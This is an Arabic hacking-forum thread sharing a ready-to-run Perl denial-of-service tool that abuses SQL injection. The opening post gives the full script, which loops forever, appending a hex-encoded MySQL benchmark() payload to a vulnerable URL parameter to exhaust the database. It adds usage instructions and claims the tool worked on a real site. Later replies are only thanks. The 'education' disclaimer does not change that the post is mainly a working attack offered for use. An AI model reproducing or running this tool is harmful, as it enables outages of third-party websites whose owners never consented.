[ أداة ] DOS via SQLi

الموضوع في 'قسم الأدوات' بواسطة Tr0y, بتاريخ ‏1 يناير 2013.

الوسوم:
حالة الموضوع:
مغلق
  1. Tr0y

    Tr0y Developer

    الأنتساب:
    ‏20 نوفمبر 2012
    المشاركات:
    12
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    3
    السلام عليكم و رحمة الله و بركاته ..
    ان شاء الله الجميع يكون بالف خير ..
    أطرح بين يديكم اداة دوس أتاك لكن المرة ليس بping بل يجب أن يكون الموقع مصاب بالسكويل أنجكشن
    خلينا نتعمق في الأداة و نشرح كيف تقوم هذه الأداة بالعمل

    كود HTML:
    $code = agent($_[0]." and (select+benchmark(99999999999,0x73656c6563742b62656e63686d61726b2839393939393939393939393939392c504f5728393939393939393939393939393939393939392c39393939293b1f))--");
    print "[".$i."] Try \n";
    $i++;
    unless($code->is_success){
    print "[+] Website Down? - In $i petitions\n";
    }
    للجماعة الي متعمقين في البيرل أظن الامر واضح ما يستحق تفسير ..
    بالنسبة للأشخاص العاديين الفكرة تكمن في تنفيذ الأمر عدة مرات حتى يسقط الموقع و هذا هو الأمر

    كود HTML:
    and (select+benchmark(99999999999,0x73656c6563742b62656e63686d61726b2839393939393939393939393939392c504f5728393939393939393939393939393939393939392c39393939293b1f))--
    الأن مع الأداة كاملة ..

    كود HTML:
    #!/usr/bin/perl -w
    #
    # SQLidoom.pl
    # By ..0x141A1D58FF.. [((3]
    # Just don't do something stupid with this tool, this is just for "education" and fun!
    # I'm not responsable for the wrong use of this software.
    
    use LWP::UserAgent;
    
    my $agent = LWP::UserAgent->new;
    #Use your custom agent
    $agent->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
    $agent->timeout(5);
    if ($ARGV[0]) {
    start($ARGV[0]);
    } else {
    info();
    }
    #Start the attack
    sub start {
    print "\n[+] Target : " . $_[0] . "\n";
    print "\n[+] Starting the attack\n[+] Info: Control+C to stop attack\n\n";
    print "\n[+] Using proxy $proxy\n\n";
    my $i=0;
    while(1){
    $SIG{INT} = \&stop;
    $code = agent($_[0]." and (select+benchmark(99999999999,0x73656c6563742b62656e63686d61726b2839393939393939393939393939392c504f5728393939393939393939393939393939393939392c39393939293b1f))--");
    print "[".$i."] Try \n";
    $i++;
    unless($code->is_success){
    print "[+] Website Down? - In $i petitions\n";
    }
    }
    }
    #Cancel the attack
    sub stop {
    print "\n[+] Stopping attack\n";
    exit 0;
    }
    #Info
    sub info {
    print "\nAttack a  SQLi  vulnerable website with some \"Magic\" and take it down in a few seconds";
    print "\nby ..0x141A1D58FF.. [((3]\n";
    print "\nUsage: perl $0 <target>\n";
    print "[info]\n";
    print "<target> should be like this http://www.target.com/something.php?id=1 \n";
    print "\nExample:";
    print "\nperl $0 'http://www.target.com/something.php?id=1'\n\n";
    exit 0;
    }
    
    sub agent {
    return $agent->get($_[0]);
    }
    الاستغلال :

    http://www.target.com/something.php?id=1

    الموقع يلزم يكون مصاب بSQLi

    ملاحظة : قمت بالتعديل في الاداة و ذلك بحذف البروكسي .. أظن أنه لم يعد شغال و جميع الحقوق محفوظة لصاحبها
    تم تجربة الأداة على موقع واحد و اشتغلة تمام :{13}:

     
  2. Dr.QuSaY

    Dr.QuSaY Developer

    الأنتساب:
    ‏13 نوفمبر 2012
    المشاركات:
    5
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    JoRdaN
    رد: DOS via SQLi


    جميل بارك الله فيك اخوي

    :{21}:
     
  3. Shдd0w

    Shдd0w Developer

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    42
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    xXxXx
    الإقامة:
    مـــصـــر
    رد: DOS via SQLi

    الله يعطيك الف عافية أخ فراس,,
    دائماً متألق بطروحاتك المفيدة والمميزة,,,
    تحياتي:{12}:​
     
  4. Error

    Error V • I • P

    الأنتساب:
    ‏3 ابريل 2012
    المشاركات:
    76
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    C:\Program Files
    رد: DOS via SQLi

    الله يجزاكك ألف خير آخوي
     
  5. رماد انسان

    رماد انسان Developer

    الأنتساب:
    ‏31 أكتوبر 2012
    المشاركات:
    16
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: DOS via SQLi

    بارك الله فيك ​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة